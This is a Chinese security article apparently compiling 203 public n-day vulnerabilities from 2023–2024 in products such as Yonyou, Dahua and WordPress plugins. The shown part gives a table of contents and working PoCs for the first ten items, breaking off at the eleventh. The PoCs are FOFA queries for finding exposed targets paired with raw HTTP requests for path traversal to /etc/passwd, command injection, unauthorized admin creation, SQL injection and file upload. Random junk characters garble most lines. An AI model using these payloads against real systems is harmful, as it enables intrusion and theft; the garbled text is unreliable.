互联网公开漏洞整理202309-202406
5 _: b6 S$ ~6 K! s1 {8 w( u道一安全 2024-06-05 07:41 北京* ]$ R0 \6 F$ ^( h$ ?! g
以下文章来源于网络安全新视界 ,作者网络安全新视界, j8 P2 T; }9 f% j( H1 W
& N9 s2 I! h- x) L: F发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
. r3 [3 f% l) P+ u3 T: @. Y9 Q3 R6 y c8 X# {( a/ I
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
1 D, Z, @# w/ K' w% K
/ n! I! h$ K' r安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。; o% S+ S% ~+ |! w/ e; x7 `
% X% J3 d( r% A8 Z2 t+ q, r" j4 R文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
$ |( Z2 Z0 E% z; b1 F$ g. ?
7 L6 Z; u6 U, ^; a1 c5 {6 }0 v合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。; ~6 C! S4 r* d1 U# `
; T: X4 @7 P# `+ D$ A# P
1 l" z# `: o# u4 e* h声明
4 y( r9 z1 Q. R( G [
1 J/ h9 n, O7 W6 q3 Y" i为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。3 Q P6 X% y& B: L: t
& I4 Q7 M! i7 T5 i/ g
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。 y5 F+ V1 y3 p0 y& B" ^
' I4 N. C$ V& I! ?$ P: V: p/ ]; I7 ^" t1 y4 M: O
9 a; ]- L. {2 U
目录
! w2 h: B% _3 u) y* ?9 p
. b" e& A; H* q4 P9 {) \012 g9 k0 b+ Z9 Z, L& l. ^1 Q
$ n% C5 i& w* O% I6 z! ^' v* h1. StarRocks MPP数据库未授权访问
, X+ J% d3 s- V2. Casdoor系统static任意文件读取2 E* ?' f2 o7 y5 ~& ~( N- K" {
3. EasyCVR智能边缘网关 userlist 信息泄漏0 l4 h3 b0 L1 ~! |' D5 K
4. EasyCVR视频管理平台存在任意用户添加2 ^2 V3 Z- g+ y0 T7 F
5. NUUO NVR 视频存储管理设备远程命令执行* q. E' `" J' A' @7 d ~
6. 深信服 NGAF 任意文件读取
: z! x5 _1 I$ V: H7. 鸿运主动安全监控云平台任意文件下载
2 {$ c# T6 z' [; q3 a6 L7 G+ |8. 斐讯 Phicomm 路由器RCE5 Z- U, J3 t8 A% c8 g
9. 稻壳CMS keyword 未授权SQL注入
/ ^0 |2 f) v& s* B5 Q) F10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
2 p$ F- {2 o0 f5 o' l6 T1 ?% y! H11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入* ]3 g, U: @! A3 o2 P4 F. |6 `# J& C
12. Jorani < 1.0.2 远程命令执行. }5 w4 h- s( J; n" ~
13. 红帆iOffice ioFileDown任意文件读取
( K3 i `) @$ L1 M- `8 O5 S: y14. 华夏ERP(jshERP)敏感信息泄露
$ ~8 i Y6 ]3 v& u- i* q, o5 V15. 华夏ERP getAllList信息泄露8 V' |3 u6 A7 y. Y* Q4 \
16. 红帆HFOffice医微云SQL注入
) [3 P1 f- P- ?' |17. 大华 DSS itcBulletin SQL 注入
; P# Z2 X3 R- o- o, F18. 大华 DSS 数字监控系统 user_edit.action 信息泄露2 ^. E. n( e( \2 @7 W
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
. C5 Q# m$ F1 j2 m$ f. x) @" ]20. 大华ICC智能物联综合管理平台任意文件读取) m& a* X+ O P$ f
21. 大华ICC智能物联综合管理平台random远程代码执行: f5 D- {- H1 q& p2 c; m
22. 大华ICC智能物联综合管理平台 log4j远程代码执行: Y- D% F9 I, @, l7 @2 U
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 W( v( b$ w: V( A. ^. r; e8 `, v24. 用友NC 6.5 accept.jsp任意文件上传% E6 v* s' u+ I8 m: F
25. 用友NC registerServlet JNDI 远程代码执行
4 {/ e# |$ w3 e' S% M- m \6 q26. 用友NC linkVoucher SQL注入1 U+ h5 P, `8 }# z; `
27. 用友 NC showcontent SQL注入
% w9 ]- _+ { _# |9 ~2 l4 }28. 用友NC grouptemplet 任意文件上传
) Y; V' ^8 E i! m |+ {29. 用友NC down/bill SQL注入
! @/ h3 n6 F9 o* g+ @4 O$ k5 f1 p30. 用友NC importPml SQL注入$ F7 t X: [) b1 S9 W7 O4 a
31. 用友NC runStateServlet SQL注入
- ]& o, j W6 p$ s' j* S32. 用友NC complainbilldetail SQL注入
7 L1 v6 d H! y7 V. S33. 用友NC downTax/download SQL注入
" T: c: v0 G; l s34. 用友NC warningDetailInfo接口SQL注入
: D6 B! }$ l1 K35. 用友NC-Cloud importhttpscer任意文件上传& N- {$ [5 I) U! F; x
36. 用友NC-Cloud soapFormat XXE
- H3 G N: _% V Q7 T2 B9 f37. 用友NC-Cloud IUpdateService XXE! {+ J3 m- P4 _4 C. p3 [
38. 用友U8 Cloud smartweb2.RPC.d XXE
' t& R2 L$ B. K A9 r39. 用友U8 Cloud RegisterServlet SQL注入4 t m5 t. W# u: M$ f( f% Q Y; g$ Y
40. 用友U8-Cloud XChangeServlet XXE# |8 w2 p+ O' @% r( p. V5 W7 U
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
+ H$ ^9 s3 B6 U, Y42. 用友GRP-U8 SmartUpload01 文件上传
- d3 t Q9 d9 X3 @- R, M43. 用友GRP-U8 userInfoWeb SQL注入致RCE
6 B5 O% |" ]/ W& z' v' S4 z/ |44. 用友GRP-U8 bx_dj_check.jsp SQL注入
! }% ^" b. x2 ]( P; O" {# q45. 用友GRP-U8 ufgovbank XXE
! K! X3 P6 I8 i46. 用友GRP-U8 sqcxIndex.jsp SQL注入' q! x5 }8 M8 D" C" O) r, t
47. 用友GRP A++Cloud 政府财务云 任意文件读取, Q7 ]: S9 E+ ^$ O; L" `5 {
48. 用友U8 CRM swfupload 任意文件上传, ^5 O4 K+ U9 {0 h* X2 b! @
49. 用友U8 CRM系统uploadfile.php接口任意文件上传; O) ~* ~0 |, U$ _
50. QDocs Smart School 6.4.1 filterRecords SQL注入# E) l' V& Y S+ B d: e
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
3 z, ?. l& y- F$ c52. 泛微E-Office json_common.php sql注入
4 q" }4 ~; m8 W1 N+ V: g# Z53. 迪普 DPTech VPN Service 任意文件上传
1 q' x7 p7 O1 V4 r @8 g54. 畅捷通T+ getstorewarehousebystore 远程代码执行
8 O) L7 D4 O/ s+ G1 l55. 畅捷通T+ getdecallusers信息泄露7 \0 }2 |7 ?' m9 }! U1 E& z5 _
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
$ W6 }4 S' g: }, m! u57. 畅捷通T+ keyEdit.aspx SQL注入3 A- Q0 l0 P1 _9 {8 N* B2 M2 g
58. 畅捷通T+ KeyInfoList.aspx sql注入* S: P$ r3 r8 |% P
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 D5 l( v2 E1 d3 n" Q8 D60. 百卓Smart管理平台 importexport.php SQL注入
& u9 \7 y, u! R$ |/ y: p8 S+ m61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
3 A3 \3 s5 h) I4 ~4 V$ E( Z# o62. IP-guard WebServer 远程命令执行
; m! p. y) f! T0 Y5 {63. IP-guard WebServer任意文件读取) a; s5 R/ y5 }* a3 b
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
, z1 v( _! E g1 q. f65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过1 |6 w9 X9 @ Z& H! @5 ?) R
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入, Z. l7 l6 x9 e6 O- b- u9 G3 \& Q
67. 万户ezOFFICE wpsservlet任意文件上传$ k% N+ R* K5 \ H6 G+ }1 S: J
68. 万户ezOFFICE wf_printnum.jsp SQL注入9 k3 L% v9 C+ o$ h4 s1 c
69. 万户 ezOFFICE contract_gd.jsp SQL注入7 Y. a. L4 R$ _* c, z# c! A
70. 万户ezEIP success 命令执行! q! z# m2 z, a8 W5 v
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
/ L, \# D; q0 J5 }4 m72. 致远OA getAjaxDataServlet XXE
5 w T+ ~* ^6 V3 u5 _, j- Z73. GeoServer wms远程代码执行1 B# C5 f3 [2 M8 k
74. 致远M3-server 6_1sp1 反序列化RCE- j7 p: I9 m6 a% j2 U
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
7 X4 @/ N# K7 Y; C$ M5 z76. 新开普掌上校园服务管理平台service.action远程命令执行4 x+ }" K" _, P& c0 P B
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
2 W: u7 Z: _% t( g+ v* u6 ~78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
& z5 @# q/ T7 Z/ Q79. BYTEVALUE 百为流控路由器远程命令执行" h5 M* l* `; A0 j* X% B+ K
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传- _- H9 ^* `$ C0 c1 X
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露/ W; q2 ?* {; k7 I
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行( m% K+ I! s* ^
83. JeecgBoot testConnection 远程命令执行
/ ]7 G j- T# d% d9 R# c84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
) }+ O. F5 Y: D6 s# M) k85. SysAid On-premise< 23.3.36远程代码执行# c" S! C* e; z! P+ D8 V% h
86. 日本tosei自助洗衣机RCE$ A+ n9 G! ^" m& Y
87. 安恒明御安全网关aaa_local_web_preview文件上传
6 A# L9 {( `; A% F$ M7 r* t$ ]88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行. G$ V3 @ P/ y( i
89. 致远互联FE协作办公平台editflow_manager存在sql注入
1 P1 y0 [/ e' i5 _2 r. L90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行4 c0 O* z7 W) K- Z$ B9 O
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取' R7 J# P% | P
92. 海康威视运行管理中心session命令执行 J7 r) S5 I, _$ |5 Q& t
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
' V7 P5 L6 f* b _1 f( N2 g( B94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传+ c4 c4 {4 s W8 ]$ \3 D
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
/ [4 `8 K8 u6 u0 ^) y& X96. Apache OFBiz 18.12.11 groovy 远程代码执行# Q% @5 z/ I& w6 `6 q
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
* }( F1 U$ |) i1 D$ g* q0 L98. SpiderFlow爬虫平台远程命令执行1 B% O- w/ w0 z% }1 `+ l: c
99. Ncast盈可视高清智能录播系统busiFacade RCE
" `7 }$ C0 l2 K7 @1 {+ M100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
! Y1 @) K* Z }8 |( b8 p0 E101. ivanti policy secure-22.6命令注入) y6 h! s, G* g) z% V, [+ G, q
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
3 `# `: I1 L2 g7 t6 @: {103. Ivanti Pulse Connect Secure VPN XXE3 j3 N5 t8 T5 ~2 r+ J/ j
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
) `! [# h& q9 R! d+ Z1 s z+ P0 k7 u. t105. SpringBlade v3.2.0 export-user SQL 注入
; T _% I9 h7 ?2 ?' o% A106. SpringBlade dict-biz/list SQL 注入
6 T& ~# k% o5 l1 `5 D* y, d107. SpringBlade tenant/list SQL 注入) u1 o2 @2 w/ k
108. D-Tale 3.9.0 SSRF8 b( o$ {+ E) V/ G& v
109. Jenkins CLI 任意文件读取- B6 A( m# f* f. @$ z
110. Goanywhere MFT 未授权创建管理员
2 f1 H+ g- B( V) b8 _ |/ j+ [111. WordPress Plugin HTML5 Video Player SQL注入) c$ Q) z# a9 o' Q
112. WordPress Plugin NotificationX SQL 注入
. L0 e- X" c+ C( J$ J2 t113. WordPress Automatic 插件任意文件下载和SSRF: |* u% t4 ?* E, s
114. WordPress MasterStudy LMS插件 SQL注入 n8 q: m' m# l9 L7 n" C
115. WordPress Bricks Builder <= 1.9.6 RCE
7 k8 Q6 J, K1 L5 h s116. wordpress js-support-ticket文件上传
/ _2 y: K7 O* J p117. WordPress LayerSlider插件SQL注入
6 [8 P/ m2 z: Z118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
# u" P: T) O: u119. 北京百绰智能S20后台sysmanageajax.php sql注入, r' E: D' u+ v$ H! B" b8 W
120. 北京百绰智能S40管理平台导入web.php任意文件上传( B% j6 K1 D" K- E& m* @9 o
121. 北京百绰智能S42管理平台userattestation.php任意文件上传6 K( l( s2 z5 d3 p2 ]( i
122. 北京百绰智能s200管理平台/importexport.php sql注入& G1 U6 K' z1 E2 \5 |& R
123. Atlassian Confluence 模板注入代码执行2 S7 v4 ^+ f f! X
124. 湖南建研工程质量检测系统任意文件上传2 I# m3 |5 O% G/ N' Y
125. ConnectWise ScreenConnect身份验证绕过5 S, L8 t$ u* ]! F7 x
126. Aiohttp 路径遍历+ @2 j# B, V. ] \! F
127. 广联达Linkworks DataExchange.ashx XXE
. X1 ]- Y5 W$ B* [* E, v1 r128. Adobe ColdFusion 反序列化% v; c& o8 F0 t" y C
129. Adobe ColdFusion 任意文件读取
, n( s4 d# I6 \4 {# p! [3 k130. Laykefu客服系统任意文件上传8 F; W( }+ g2 x# }+ B- }
131. Mini-Tmall <=20231017 SQL注入
* G3 ^& p& O' l- X132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
3 V* [/ ?1 ?" J133. H5 云商城 file.php 文件上传$ y0 w& B# d2 J' i' u- Q4 `: g
134. 网康NS-ASG应用安全网关index.php sql注入
- f: m$ I3 ^" S135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
. l& Q3 d5 `, v d' l136. NextChat cors SSRF
. [5 t# V/ M, s3 @ p5 D3 [137. 福建科立迅通信指挥调度平台down_file.php sql注入7 h% R \8 M: C1 E) @6 K
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
1 _. x6 h( _/ ?, M' `139. 福建科立讯通信指挥调度平台editemedia.php sql注入
: w0 m4 ]3 p$ s: i& [& y% D140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
8 A1 I% H9 j# p$ \3 t4 b141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
1 O+ _) W, t( N- S7 X- \142. CMSV6车辆监控平台系统中存在弱密码5 q* ~3 N! `- n8 }
143. Netis WF2780 v2.1.40144 远程命令执行
S' X- y. A6 C) P144. D-Link nas_sharing.cgi 命令注入9 |0 Q% }, o1 I* Q! O L
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
+ w7 D" p% Z8 @; `0 ^" [146. MajorDoMo thumb.php 未授权远程代码执行. [) F2 X3 N( z, a F9 g
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
5 Y# a4 V. a2 t" r148. CrushFTP 认证绕过模板注入
, ~3 z/ F/ p( Y# l" K149. AJ-Report开源数据大屏存在远程命令执行: H( v( C/ G. W6 ~
150. AJ-Report 1.4.0 认证绕过与远程代码执行
3 F w* L! j$ E151. AJ-Report 1.4.1 pageList sql注入* h( l7 @# h) I/ d' [4 |- ?% o7 R
152. Progress Kemp LoadMaster 远程命令执行7 E# r; L" a6 {: U2 j
153. gradio任意文件读取. F4 [% \! T- P
154. 天维尔消防救援作战调度平台 SQL注入6 Z6 g4 r% a/ n0 o
155. 六零导航页 file.php 任意文件上传
* Z- N2 Q5 n4 A4 F6 F* W0 |156. TBK DVR-4104/DVR-4216 操作系统命令注入( C- {3 F/ O2 o% X2 F5 r
157. 美特CRM upload.jsp 任意文件上传7 \/ u5 d" ]) {: k
158. Mura-CMS-processAsyncObject存在SQL注入7 r1 ?: K* Q# E u' t' H' U4 q
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
1 x/ l! T7 h% x# z3 u- K. H: t( v160. Sonatype Nexus Repository 3目录遍历与文件读取
, f1 Y$ B* K$ C161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传" l# ?6 ~: j( I" A) }7 Z6 n! ^
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
: ^# b$ Z& d- n163. 号卡极团分销管理系统 ue_serve.php 任意文件上传# a% v' B {6 |. k
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
) a5 b7 _/ w& H8 ~4 l) u' Y2 r165. OrangeHRM 3.3.3 SQL 注入) L$ n- R. @- p8 s8 a- h6 |2 R2 ^! T
166. 中成科信票务管理平台SeatMapHandler SQL注入: k) k/ P# }* c, {1 a, ~! ^# J
167. 精益价值管理系统 DownLoad.aspx任意文件读取8 f# ?6 W5 K+ X8 ^% Q
168. 宏景EHR OutputCode 任意文件读取+ I2 `. ?+ E4 z3 ?
169. 宏景EHR downlawbase SQL注入
, U; E" _$ `" v3 L1 o5 S170. 宏景EHR DisplayExcelCustomReport 任意文件读取. E8 ?7 l0 P, l% v. |/ a
171. 通天星CMSV6车载定位监控平台 SQL注入
; v+ m; f" r& D( l V172. DT-高清车牌识别摄像机任意文件读取
* q% u3 |, Z8 @9 n6 R0 `& ]- z173. Check Point 安全网关任意文件读取
+ u. V* [- \# `' M; V2 `2 `7 o174. 金和OA C6 FileDownLoad.aspx 任意文件读取1 z' R2 r. X* f* x1 j ~8 p# w$ v
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入% `& A$ K- Q" j: n1 g' y
176. 电信网关配置管理系统 rewrite.php 文件上传3 r% x. D N1 b; K
177. H3C路由器敏感信息泄露
! T' g7 l5 K4 Y3 |7 T" U/ c178. H3C校园网自助服务系统-flexfileupload-任意文件上传
# `3 v7 x6 z, X! o) y5 f179. 建文工程管理系统存在任意文件读取
5 {/ \) c% z8 o$ k& q180. 帮管客 CRM jiliyu SQL注入
7 q1 r: @. o! V$ D6 E/ Z181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
Y8 `4 c; j1 f m [; S182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
9 `+ i7 j" p& V% t" y# p183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
* u0 |- Z. F4 k8 y) X184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
/ b" u& Z& X$ \% v5 F% l; h n5 K185. 瑞友天翼应用虚拟化系统SQL注入
& {5 G* s" q$ V, A: V186. F-logic DataCube3 SQL注入3 i% I3 p2 I+ b
187. Mura CMS processAsyncObject SQL注入
0 O' D& t8 K4 L* y' X188. 叁体-佳会视频会议 attachment 任意文件读取
* s0 T% x4 ^7 n2 \# `5 [189. 蓝网科技临床浏览系统 deleteStudy SQL注入
k" ^2 V _0 h" l; v$ h190. 短视频矩阵营销系统 poihuoqu 任意文件读取, b4 a2 t* l/ O2 u* k, @
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入& Q# y# A: v# X8 t; [: u" W! a
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传% V8 Z1 A. Z) J: `5 P+ e2 o
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行: Z3 R$ ^% e6 A2 a" o
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传 L' P! f; Y! l$ Z
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行) X4 A5 o* `3 }+ B( L" f# e+ a
196. 河南省风速科技统一认证平台密码重置
1 W9 _# s$ \# N( a& w197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入% I+ ?* e) e9 C3 S2 V
198. 阿里云盘 WebDAV 命令注入
& ~* N, y; t3 A+ a7 E8 m199. cockpit系统assetsmanager_upload接口 文件上传
8 V2 W& |& J% J \200. SeaCMS海洋影视管理系统dmku SQL注入/ ], k- Q" E0 Y# a2 y( ^" L
201. 方正全媒体新闻采编系统 binary SQL注入
8 o9 }3 _0 B# V5 @202. 微擎系统 AccountEdit任意文件上传' W" B# y+ s% a7 @
203. 红海云EHR PtFjk 文件上传! A' N. ~3 ~2 ~: g Q( H
# Z- s. {1 A6 _- I0 VPOC列表- ?+ H2 ]' c3 n- h; H
3 D6 |. G$ B* @9 z. u, t2 W
02
# {4 b* x1 V! T: {# m, n0 o0 M
4 G* c e M% x+ Y1 ^$ m3 T5 K1. StarRocks MPP数据库未授权访问- O) D8 N( }- ~1 C; |' f
FOFA :title="StarRocks"/ u, H9 A b% T+ R- u
GET /mem_tracker HTTP/1.1
: F' c2 Q) @3 }$ [( v- uHost: URL& [- b+ M& x& q- v( K
7 _# R8 X& k6 ~9 x# _+ `6 V+ n
: P- S3 s1 N$ s* n' ~5 s* ^5 U. _) ^2. Casdoor系统static任意文件读取
. m! G. T4 p) O2 C; [FOFA :title="Casdoor"
# n; G+ A0 v9 s0 l% }3 X* ]GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
2 n* R; K- V1 B X7 Z! a! S* K8 R; nHost: xx.xx.xx.xx:99990 |6 G2 u. Q/ m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# f. _# p: e' R4 a0 D2 V1 NConnection: close
8 F( b( I% l# rAccept: */*+ } h% i {, H8 ^
Accept-Language: en5 E2 P, A) |6 J6 ~
Accept-Encoding: gzip
" w( a& v# c8 D5 p, x6 G T5 K- w$ b; X8 W* c4 H4 O0 Y
/ _7 V" x3 O8 ]/ {
3. EasyCVR智能边缘网关 userlist 信息泄漏8 t& }4 ~, f/ A1 w
FOFA :title="EasyCVR"
4 S: V& G. ^* a: xGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1! m, B& D: N, C0 |: [ u
Host: xx.xx.xx.xx4 m$ | M3 s [" c0 \9 _
H, N( f: [8 x' p( B
; M3 [2 d. k' A! ^; [ W4. EasyCVR视频管理平台存在任意用户添加# K+ E( w# B0 n$ _1 n7 n9 R& J
FOFA :title="EasyCVR"
" S$ e- ]! S, Q% x# V& ~
3 M2 a# v2 w/ x# D4 O( upassword更改为自己的密码md5
7 P3 v+ p- u: Y8 U0 MPOST /api/v1/adduser HTTP/1.1
/ J$ f" d- [; A4 A3 UHost: your-ip
+ h, P. `4 \0 t; k, w/ U$ RContent-Type: application/x-www-form-urlencoded; charset=UTF-8
1 @9 ^6 m! U/ J9 b( r. P( \8 i% Z6 S. ?4 O5 i, b W! p q
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
0 x0 J) P4 d Q9 `% G( f
& k* U& u' ` ~5 L
5 j F/ F; e" w% N6 _( M% D* m8 x4 D5. NUUO NVR 视频存储管理设备远程命令执行
! [' |; m' ~ y. q: ^! \FOFA:title="Network Video Recorder Login". x/ y5 {4 P( D: J. G { a O
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.14 }/ u2 w7 }& z# d' y+ a. T) I
Host: xx.xx.xx.xx
( F# u9 g7 P3 S: x; b5 f e4 b( D
! v" k2 a! o& o* F) L. M& b9 U2 g, V$ p! N& ~2 K
6. 深信服 NGAF 任意文件读取
3 o) ~( A7 t$ f% WFOFA:title="SANGFOR | NGAF"' f9 E$ E: p9 n
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
2 B) c' ?8 J) x1 j$ z; m6 BHost:
5 g7 U. @# `5 I" G I" e& x. q0 E% x
+ }! b. }3 c$ E5 R. k' n7. 鸿运主动安全监控云平台任意文件下载
' P, Y' q* H# s2 dFOFA:body="./open/webApi.html"8 t1 [7 s$ z- `. w
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1( `# W" z' \6 d$ H+ x+ q1 A
Host:
6 [% w5 \7 H% G2 Y5 l9 k5 h4 t- M6 L& E F
1 M4 f6 b) e& V+ |8. 斐讯 Phicomm 路由器RCE
* b2 c! Q% u* y9 @9 u: jFOFA:icon_hash="-1344736688"
! \0 Y. x0 a9 S3 r1 `2 \默认账号admin登录后台后,执行操作. h3 b9 s9 w, o) R; @& @
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
' A: g! O4 o& C$ q- q0 {+ a j& vHost: x.x.x.x+ Z8 ?9 F( p1 f/ g) J# m
Cookie: sysauth=第一步登录获取的cookie- W! i) S" h% b' P7 r8 _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz' \+ D* ]% G( A2 V( o6 L* T0 Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.366 O s* `. A1 K! {' b/ [4 p! y
) E# r+ d0 r w
------WebKitFormBoundaryxbgjoytz
: J4 B% R3 Y0 t3 c: S r( oContent-Disposition: form-data; name="wifiRebootEnablestatus"# d+ r$ P/ ~3 C7 z8 g/ J u
# ^+ P5 s# g' m" s5 j; ~. S
%s4 Y. U: h- y1 f8 X _
------WebKitFormBoundaryxbgjoytz R* u4 T. L! T& v4 _
Content-Disposition: form-data; name="wifiRebootrange"% Z. y6 _9 P& s/ R9 ^# M
C' X; j6 L l2 ]; d# i% I: ^
12:00; id;4 m6 ^3 @4 U; P, s8 s, ]8 e! V
------WebKitFormBoundaryxbgjoytz
( O2 B- f& S( D5 \# b+ _Content-Disposition: form-data; name="wifiRebootendrange" p3 n5 y7 x* D
/ x- q9 w0 S3 R l: C3 r
%s:
$ Y6 R: {( S7 I5 O------WebKitFormBoundaryxbgjoytz
2 R8 J9 `- \0 ~! o+ d6 pContent-Disposition: form-data; name="cururl2", G, r) x- p( x& J. c+ n
* E( u6 C' e) ?" m6 m* u& i" @7 s0 P5 Z& y" q* y3 c6 R. I
------WebKitFormBoundaryxbgjoytz--) S7 j! a+ ~8 G5 N" j/ p
j- C( B; T) P: d1 l8 `. X
2 s6 [& y+ a. z- Y$ j! y. g9 m& c" H" V9. 稻壳CMS keyword 未授权SQL注入
? d5 _1 U4 Y8 g6 k* D, f6 u6 TFOFA:app="Doccms"7 ?& @" P- w) v! w% _/ ]$ u
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1& R, S9 M, v* d, r# O- v
Host: x.x.x.x
: _, q! r3 u, f5 ~: F7 H! i
5 p2 N, A6 e- ?. H. q0 G
8 B. W+ e6 {3 K8 L1 ]0 `payload为下列语句的二次Url编码
( _1 O- R; r/ G; k9 y: T8 T
4 d/ y/ ^# t! |& l; p' V; S' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
: b' w/ j3 ]9 c- u$ M# M9 O/ R+ m. G9 M* h' y t
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
; O6 W( I+ Q+ gFOFA:icon_hash="953405444"- q/ e3 { D4 C$ l' R: J
! \" s- z* i0 X( S% M9 N文件上传后响应中包含上传文件的路径- o' ~+ r; S/ n$ ~: s" Q! T
POST /eis/service/api.aspx?action=saveImg HTTP/1.11 w) C& ?- f$ P3 P; D1 _, C( }
Host: x.x.x.x:xx# q% q) P% H& {8 l. p4 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.360 _4 ~+ L! b1 c9 Q/ P c
Content-Length: 1972 z/ m G; p/ o; T0 P* ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
$ U* Z6 u4 o( XAccept-Encoding: gzip, deflate3 I! C2 p+ m* p
Accept-Language: zh-CN,zh;q=0.9
7 n {# c. t6 v& XConnection: close
) f+ h3 U5 Z- L* `( ~/ A6 `; X' E, h, c/ rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu' W& i' g3 {1 H' l, A8 t2 E
5 Z }- ~7 {) J8 P# p------WebKitFormBoundaryxdgaqmqu
# V! d, S0 L0 \, r$ o: A' M `Content-Disposition: form-data; name="file"filename="icfitnya.txt"1 L) R3 e2 e# ]: p* E! R8 C
Content-Type: text/html4 Y6 ]7 |' U$ W
: k; V& F: Z( u f9 Q" p. S5 v' sjmnqjfdsupxgfidopeixbgsxbf
. O3 E# I$ I `9 V7 z7 b------WebKitFormBoundaryxdgaqmqu--
) r9 Z' K7 V. v- Q5 N4 v, N1 S7 X f1 a2 i L' G
6 \0 f' N% i# I5 |5 K, D11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入0 x: v' _/ R# Z( i
